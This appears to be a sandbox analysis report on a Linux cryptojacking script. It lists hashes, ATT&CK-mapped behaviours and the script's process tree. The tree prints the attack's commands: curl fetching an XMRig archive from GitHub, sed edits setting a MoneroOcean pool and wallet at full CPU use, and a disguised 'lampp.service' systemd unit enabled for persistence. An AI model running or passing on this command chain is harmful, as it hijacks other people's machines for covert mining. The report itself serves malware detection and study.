xmrig | d97530313d2423ba8c3e87ccd3d66e6cd77997d26bbb4d1dd2a5f32827dde8cd

Analysis

max time kernel
1s
max time network
1045s
platform
ubuntu-22.04_amd64
resource
ubuntu2204-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu2204-amd64-20240611-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system
submitted
01-07-2024 11:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

script.sh
Size

8KB
MD5

97423634cc1762b2f010cb860e7fb47d
SHA1

2f50775e8fe9ab98a80f06d835c5874091bf0b3e
SHA256

d97530313d2423ba8c3e87ccd3d66e6cd77997d26bbb4d1dd2a5f32827dde8cd
SHA512

bd5279178f713edaca1754937a859fa41dbec1fdd15c8ad3cb11894142e389d97bf3ca7f0402c018a616053b1121650ed609498a4b34c4def829e02924f6de1f
SSDEEP

192:fFa1ZIJvH8czpCyzdpB3f1SAij8E3YUNvmTC8KfbmP/oYv0Yd:fEHexC+HSAHE3YUN+TC8SbmQUfd

Score

10^/10

xmrig antivm miner

Malware Config

Signatures

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral3/files/fstream-2.dat	family_xmrig
behavioral3/files/fstream-2.dat	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Executes dropped EXE 1 IoCs

ioc	pid	Process
/root/lampp/xmrig	1584	xmrig

Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

Checks DMI information which indicate if the system is a virtual machine.

antivm

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/product_name	xmrig

Enumerates running processes
Discovers information about currently running processes on the system

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
2	raw.githubusercontent.com
3	raw.githubusercontent.com
4	raw.githubusercontent.com

Reads hardware information 1 TTPs 14 IoCs

Accesses system info like serial numbers, manufacturer names etc.

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/product_version	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/board_name	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/board_version	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	xmrig

Checks CPU configuration 1 TTPs 1 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
File opened for reading	/proc/cpuinfo	xmrig

Reads CPU attributes 1 TTPs 45 IoCs

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/cpu0/topology/package_cpus	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/level	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/base_frequency	xmrig
File opened for reading	/sys/devices/system/cpu/online	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/level	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/number_of_sets	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cpu_capacity	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/level	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/topology/cluster_cpus	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/topology/physical_package_id	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/size	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/number_of_sets	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/id	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/id	xmrig
File opened for reading	/sys/devices/system/cpu/possible	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/topology/core_id	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/type	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/level	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index7/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index9/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/size	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/number_of_sets	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index4/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/id	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/type	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index5/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/type	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/topology/core_cpus	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/topology/die_cpus	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/type	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/id	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/size	xmrig

Enumerates kernel/hardware configuration 1 TTPs 24 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/node/node0/cpumap	xmrig
File opened for reading	/sys/devices/system/node/node0/meminfo	xmrig
File opened for reading	/sys/devices/system/node/node0/hugepages	xmrig
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-1048576kB/nr_hugepages	xmrig
File opened for reading	/sys/devices/system/node/node0/access1/initiators	xmrig
File opened for reading	/sys/devices/system/node/node0/access0/initiators/write_bandwidth	xmrig
File opened for reading	/sys/devices/system/cpu	xmrig
File opened for reading	/sys/kernel/mm/hugepages	xmrig
File opened for reading	/sys/devices/system/node/node0/access0/initiators/read_latency	xmrig
File opened for reading	/sys/bus/dax/devices	xmrig
File opened for reading	/sys/devices/system/node/node0/access0/initiators/read_bandwidth	xmrig
File opened for reading	/sys/devices/virtual/dmi/id	xmrig
File opened for reading	/sys/devices/cpu_atom/cpus	xmrig
File opened for reading	/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages	xmrig
File opened for reading	/sys/fs/cgroup/cpuset.mems.effective	xmrig
File opened for reading	/sys/devices/cpu_core/cpus	xmrig
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages	xmrig
File opened for reading	/sys/devices/system/node/node0/access0/initiators	xmrig
File opened for reading	/sys/devices/system/node/node0/access0/initiators/write_latency	xmrig
File opened for reading	/sys/bus/soc/devices	xmrig
File opened for reading	/sys/fs/cgroup/cpuset.cpus.effective	xmrig
File opened for reading	/sys/devices/system/node/online	xmrig
File opened for reading	/sys/fs/cgroup/cgroup.controllers	xmrig
File opened for reading	/sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages	xmrig

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/sys/kernel/ngroups_max	sudo
File opened for reading	/proc/26/stat	killall
File opened for reading	/proc/217/stat	killall
File opened for reading	/proc/593/stat	killall
File opened for reading	/proc/827/stat	killall
File opened for reading	/proc/1061/stat	killall
File opened for reading	/proc/1434/stat	killall
File opened for reading	/proc/99/stat	killall
File opened for reading	/proc/661/stat	killall
File opened for reading	/proc/700/stat	killall
File opened for reading	/proc/15/stat	killall
File opened for reading	/proc/90/stat	killall
File opened for reading	/proc/1095/stat	killall
File opened for reading	/proc/1124/stat	killall
File opened for reading	/proc/1375/stat	killall
File opened for reading	/proc/1158/stat	killall
File opened for reading	/proc/1576/stat	killall
File opened for reading	/proc/92/stat	killall
File opened for reading	/proc/119/stat	killall
File opened for reading	/proc/505/stat	killall
File opened for reading	/proc/678/stat	killall
File opened for reading	/proc/770/stat	killall
File opened for reading	/proc/1178/stat	killall
File opened for reading	/proc/94/stat	killall
File opened for reading	/proc/531/stat	killall
File opened for reading	/proc/585/stat	killall
File opened for reading	/proc/1487/stat	killall
File opened for reading	/proc/1/limits	sudo
File opened for reading	/proc/263/stat	killall
File opened for reading	/proc/867/stat	killall
File opened for reading	/proc/637/stat	killall
File opened for reading	/proc/641/stat	killall
File opened for reading	/proc/sys/kernel/ngroups_max	sudo
File opened for reading	/proc/21/stat	killall
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/81/stat	killall
File opened for reading	/proc/411/stat	killall
File opened for reading	/proc/587/stat	killall
File opened for reading	/proc/1310/stat	killall
File opened for reading	/proc/74/stat	killall
File opened for reading	/proc/636/stat	killall
File opened for reading	/proc/850/stat	killall
File opened for reading	/proc/1194/stat	killall
File opened for reading	/proc/1428/stat	killall
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/414/stat	killall
File opened for reading	/proc/self/stat	sudo
File opened for reading	/proc/89/stat	killall
File opened for reading	/proc/676/stat	killall
File opened for reading	/proc/1507/stat	killall
File opened for reading	/proc/driver/nvidia/gpus	xmrig
File opened for reading	/proc/sys/kernel/ngroups_max	sudo
File opened for reading	/proc/1333/stat	killall
File opened for reading	/proc/1/limits	sudo
File opened for reading	/proc/filesystems	sudo
File opened for reading	/proc/211/stat	killall
File opened for reading	/proc/1609/stat	killall
File opened for reading	/proc/self/stat	sudo
File opened for reading	/proc/195/stat	killall
File opened for reading	/proc/198/stat	killall
File opened for reading	/proc/1054/stat	killall
File opened for reading	/proc/1236/stat	killall
File opened for reading	/proc/1157/stat	killall

Writes file to tmp directory 2 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/xmrig.tar.gz	curl
File opened for modification	/tmp/lampp.service	script.sh

/tmp/script.sh
/tmp/script.sh
1⤵
- Writes file to tmp directory
PID:1565
- /usr/bin/cut
  cut -f1 -d.
  2⤵
  PID:1568
- /usr/bin/nproc
  nproc
  2⤵
  PID:1569
- /usr/bin/bc
  bc -l
  2⤵
  PID:1572
- /usr/bin/curl
  curl -L --progress-bar https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.tar.gz -o /tmp/xmrig.tar.gz
  2⤵
  - Writes file to tmp directory
  PID:1573
- /usr/bin/mkdir
  mkdir /root/lampp
  2⤵
  PID:1579
- /usr/bin/tar
  tar xf /tmp/xmrig.tar.gz -C /root/lampp
  2⤵
  PID:1580
- - /usr/local/sbin/gzip
    gzip -d
    3⤵
    PID:1581
- - /usr/local/bin/gzip
    gzip -d
    3⤵
    PID:1581
- - /usr/sbin/gzip
    gzip -d
    3⤵
    PID:1581
- - /usr/bin/gzip
    gzip -d
    3⤵
    PID:1581
- /usr/bin/rm
  rm /tmp/xmrig.tar.gz
  2⤵
  PID:1582
- /usr/bin/sed
  sed -i "s/\"donate-level\": *[^,]*,/\"donate-level\": 1,/" /root/lampp/config.json
  2⤵
  - Reads runtime system information
  PID:1583
- /root/lampp/xmrig
  /root/lampp/xmrig --help
  2⤵
  - Executes dropped EXE
  - Checks hardware identifiers (DMI)
  - Reads hardware information
  - Checks CPU configuration
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:1584
- /usr/bin/hostname
  hostname
  2⤵
  PID:1587
- /usr/bin/sed
  sed -r "s/[^a-zA-Z0-9\\-]+/_/g"
  2⤵
  PID:1589
- /usr/bin/cut
  cut -f1 -d.
  2⤵
  PID:1588
- /usr/bin/sed
  sed -i "s/\"url\": *\"[^\"]*\",/\"url\": \"gulf.moneroocean.stream:10001\",/" /root/lampp/config.json
  2⤵
  PID:1590
- /usr/bin/sed
  sed -i "s/\"user\": *\"[^\"]*\",/\"user\": \"47zZneDdPNr63HM9ubMyrhYvLNbDunCkiia6fNCvQkThNuK6rrj59e3Y2nNF3ETeewbALAGYaiti4SF4ENwJ8bR7PKXXcMN\",/" /root/lampp/config.json
  2⤵
  PID:1591
- /usr/bin/sed
  sed -i "s/\"pass\": *\"[^\"]*\",/\"pass\": \"ubuntu2204-amd64-20240611-en-4\",/" /root/lampp/config.json
  2⤵
  - Reads runtime system information
  PID:1592
- /usr/bin/sed
  sed -i "s/\"max-cpu-usage\": *[^,]*,/\"max-cpu-usage\": 100,/" /root/lampp/config.json
  2⤵
  PID:1593
- /usr/bin/sed
  sed -i "s/\"max-threads-hint\": *[^,]*,/\"max-threads-hint\": 100,/" /root/lampp/config.json
  2⤵
  PID:1594
- /usr/bin/sed
  sed -i "s#\"log-file\": *null,#\"log-file\": \"/root/lampp/xmrig.log\",#" /root/lampp/config.json
  2⤵
  PID:1595
- /usr/bin/sed
  sed -i "s/\"syslog\": *[^,]*,/\"syslog\": true,/" /root/lampp/config.json
  2⤵
  PID:1596
- /usr/bin/cp
  cp /root/lampp/config.json /root/lampp/config_background.json
  2⤵
  PID:1597
- /usr/bin/sed
  sed -i "s/\"background\": *false,/\"background\": true,/" /root/lampp/config_background.json
  2⤵
  PID:1598
- /usr/bin/cat
  cat
  2⤵
  PID:1599
- /usr/bin/chmod
  chmod +x /root/lampp/miner.sh
  2⤵
  PID:1600
- /usr/bin/sudo
  sudo -n true
  2⤵
  - Reads runtime system information
  PID:1601
- - /usr/bin/true
    true
    3⤵
    PID:1602
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1605
- /usr/bin/grep
  grep MemTotal /proc/meminfo
  2⤵
  PID:1604
- /usr/bin/cat
  cat
  2⤵
  PID:1606
- /usr/bin/sudo
  sudo mv /tmp/lampp.service /etc/systemd/system/lampp.service
  2⤵
  PID:1607
- - /usr/bin/mv
    mv /tmp/lampp.service /etc/systemd/system/lampp.service
    3⤵
    PID:1608
- /usr/bin/sudo
  sudo killall xmrig
  2⤵
  - Reads runtime system information
  PID:1609
- - /usr/bin/killall
    killall xmrig
    3⤵
    - Reads runtime system information
    PID:1610
- /usr/bin/sudo
  sudo systemctl daemon-reload
  2⤵
  PID:1611
- - /usr/bin/systemctl
    systemctl daemon-reload
    3⤵
    PID:1612
- /usr/bin/sudo
  sudo systemctl enable lampp.service
  2⤵
  - Reads runtime system information
  PID:1646
- - /usr/bin/systemctl
    systemctl enable lampp.service
    3⤵
    PID:1647
- /usr/bin/sudo
  sudo systemctl start lampp.service
  2⤵
  - Reads runtime system information
  PID:1689
- - /usr/bin/systemctl
    systemctl start lampp.service
    3⤵
    - Reads runtime system information
    PID:1690

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/root/lampp/config.json

Filesize
2KB

MD5
f3294129e6b76283965ad86a815bf383

SHA1
5fe0ab538f86962efe82cb13fc2da745610740af

SHA256
578386126ae451940ff5c21ce95b4e3be85c2d33160d6e739ed0ebbd206c7e81

SHA512
07a280be17282096ed8c319623d2e02e088e80d69e3d6d24ecaef5bedf624d006dc4963b8b1a6c0569a3c9221786bfd7cd462dddebcfcbed7879fd994b4c8333

Download Submit
/root/lampp/miner.sh

Filesize
253B

MD5
f96a321a262287ceae164f23f232ed9c

SHA1
d1eeab41f244b42377afd7cc3de7428736162b24

SHA256
f572e87f0fc93c5a62023a572cf4c797c942d7618167752779854d6f73efa012

SHA512
75fc451b1f3138dbecd907ba5af2246884582190f85b4f574a99696439a3d6839c34a9310d21d206148870c7e6e7604a7ebd8bbd23406c57c6c6346fcb9cc86e

Download Submit
/root/lampp/sed2bitSR

Filesize
2KB

MD5
e97075d2441e00ab423b2b9be5b777eb

SHA1
12fc9d7ac7c4964bac28d5fbf7494161df7e9172

SHA256
e07a8c34217ef9c5361a9e114551f5e21378a1081c798dc6cd88fa81b3bf673e

SHA512
712ad83f969992caeb27539f4e9d22d2433311a5814ee991f538eb6016985bca966415c6a7184b5123d3b5203fdff58cc90e061ba478f4d83b903747171cb8a8

Download Submit
/root/lampp/sedBmzcez

Filesize
2KB

MD5
8b11b027dd187104473ee7d661ffe25f

SHA1
ec46117e3b0c2ce9f7fe60ac51eb1861c49e97ef

SHA256
984513d85c8a81fbca982bd8c81a73344f39a4fe46bd9b982ed85c0ff6d1030f

SHA512
1078b6b53897534be9f070454b8545f8075017025f9252175cfc6651c7eb11a906230558daa22a1086790f5fd5fed43b9b1909b044c70fafae9aba2d99381ea2

Download Submit
/root/lampp/sedNALBo3

Filesize
2KB

MD5
e4fa71467c51cf7a87b327689e5853e6

SHA1
cb098c7b478ec86b951e5898b5164ead191cf52e

SHA256
8829c674574337b830e6ac828ec403f655808e947eae32705c392744e9080e60

SHA512
ab71614c1da31bb4591d34d5bd97a4d6fff96cc297cf62f3ec23b237b82a41d0cec6101b476ae6b55d7f8d1114eb3815f29bc7f86f4976bcf0e657c0d072c59f

Download Submit
/root/lampp/sedXHpI1F

Filesize
2KB

MD5
15616bc8e5bc9e3daf7472ea12574c82

SHA1
339ce7fd66e0ef9c077a7ed3c4e294fb438dbf8c

SHA256
c86a81571abac0433ba0b105e91c06c359b36f44cd019338529fa8fd57ff406e

SHA512
f60c707623933c9b5b369e7f05fbd2cb353503a8961de9bda819eeb6276a3617e8ca8126f4951240af7c468b35c3b5795b734fb15c713ac07333abe6b9441507

Download Submit
/root/lampp/sedf2bQgV

Filesize
2KB

MD5
23d9f1929c1a9251ae20fad667d6a2cf

SHA1
4e789d89088f3f340b70e330be60973735ba4c7b

SHA256
11ddb2e5abc95516a2e0b0fd9e55766d33812f46225ea45efb2c212e12b13d6b

SHA512
8f22b33052d05cccd42cb89ef22e917e387261c02828fe8e8796b30c8bf7124565932461a78299f96f02e8fa902cf9f1f96cc56298d53970e239c7bb77b36125

Download Submit
/root/lampp/sedpypHIg

Filesize
2KB

MD5
d489ddbbb83271e967b8af615d17d3c7

SHA1
f0394a367a60e9727269882154098dec802774ef

SHA256
5cf89bb7fbef53cc5fbe582017145aa148ad8a8abc5bceee9f887ba4a6fcc46e

SHA512
aba9bf29076f1d5b6e81c83e5be1cee5934d23db9093ec3ea8b4d92b521e37e58d80aaea6248dc211544574f3772df990950b9236f40e863a76220f86b157954

Download Submit
/root/lampp/xmrig

Filesize
8.4MB

MD5
e6b2f9d13d45c128b44cb5405df9ab39

SHA1
c07326f69240e3d22d134d156528af3bd5d0497b

SHA256
96462c80ee4118a9140b159d5bbf5f3a40a8693d650919e29b23bd3c9c7e4162

SHA512
4eef70930aae075d38a871c380b2d1322c5a3cfdfdd6e936447e384bfd6c3f71b4ad7a9dc1dd2213a946f32681686f0db0b6f6e1caf1286a0a7fe36a26ac5632

Download Submit
/tmp/lampp.service

Filesize
177B

MD5
540c899b78585827e807a62f7345eaf5

SHA1
8bf3146889c6b15811f226bff9fbca24d184eff2

SHA256
b32af10b7911d7113a1fe52ef467e7f123fb26552cae752ba52aef684b301fcf

SHA512
0aac2aced9505d1bde7d6c2fb6166a341982e9a170e7f0f72ede35c1305c4519e2fb07a7658558b41ad319c3d102f07d667a8769ff659b6392c81698d278af46

Download Submit
/tmp/xmrig.tar.gz

Filesize
3.4MB

MD5
e003a3ec8bdd61151a61cadf950502c4

SHA1
2606bd45a8d45092c7d2c0ac9d6e92ec7ef7950e

SHA256
80b1dc6f56a95273420dc96e837d7e1a9f42c057e319dadac0cccee4425319e0

SHA512
ef80c71d8b0d09128abf9e67fe12a8cd843500419da43e7a284e016029391d826c503aeec3073a2b3d7d90ba24f18990edf6965cd38a270bbe57f20c6be022f9

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads